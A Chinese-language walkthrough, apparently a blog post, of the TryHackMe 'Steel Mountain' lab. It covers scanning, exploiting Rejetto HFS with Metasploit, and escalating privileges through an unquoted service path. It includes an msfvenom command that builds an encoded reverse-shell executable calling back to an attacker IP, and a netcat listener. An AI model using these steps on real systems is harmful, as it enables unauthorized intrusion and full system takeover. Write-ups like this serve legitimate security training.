谁是本月最佳员工?
直接访问目标机器,可以看到一个图片,检查得到该图片的名称为Bill Harper
初始访问
使用 nmap 扫描机器。运行 Web 服务器的另一个端口是什么?
看看另一个 Web 服务器。什么文件服务器正在运行?
直接提交HTTP File Server
是错误的,网上搜索得到完成名称Rejetto HTTP File Server
利用此文件服务器的CVE编号是多少?
使用msfconsole
搜索HFS
,并使用info
查看该漏洞模块的详细信息,在最后得到该漏洞的CVE编号
使用 Metasploit 获取初始 shell。什么是用户标志?
使用msfconsole
利用
特权升级
为了枚举这台机器,我们将使用一个名为 PowerUp 的 powershell 脚本,其目的是评估 Windows 机器并确定任何异常 - “ PowerUp旨在成为 依赖错误配置的常见 Windows 特权升级向量的工具
访问该链接条件到下载页面,注意这里是将该脚本下载到本机,然后上传到目标机器
该脚本基于powershell
,所以我们需要使用目标主机的powershell
,可以还是用load powershell
加载powershell
,然后使用powershell_shell
进入目标的powershell命令行
运行Powerup.ps1
脚本,输入Invoke-AllChecks
检查
注意CanRestart为true选项,可以发现AdvancedSystemCareService9
服务具有路径引用服务的问题,并且运行的账户是LocalSystem
CanRestart 选项为True,将允许我们在主机上重启该服务,并且Path
路径可以进行配置,我们可以将恶意程序替换合法的程序,重启该服务,该主机会受到我们的攻击
使用 msfvenom生成反向 shell 作为 Windows可执行文件
msfvenom -p windows/shell_reverse_tcp LHOST=10.2.34.252 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
注意这里使用shell_reverse_tcp
无阶段的payload
,不然nc
会收不到shell
使用nc -lvp 4443
监听
将生成的Advanced.exe
上传到C:\Program Files (x86)\IObit\Advanced.exe
,该漏洞形成的原因是因为管理员在设置PATH
的时候没有使用""双引号
对目录进行锁定
然后进入目标shell
,重启服务即可获得system
权限的shell
注意:这里服务显示为未引用(并且可以使用此技术进行利用),也可以使用弱文件属性直接修改PATH
什么是root标志?
标签:Steel,Mountain,shell,THM,exe,使用,服务器,powershell,Advanced From: https://www.cnblogs.com/Junglezt/p/17264448.html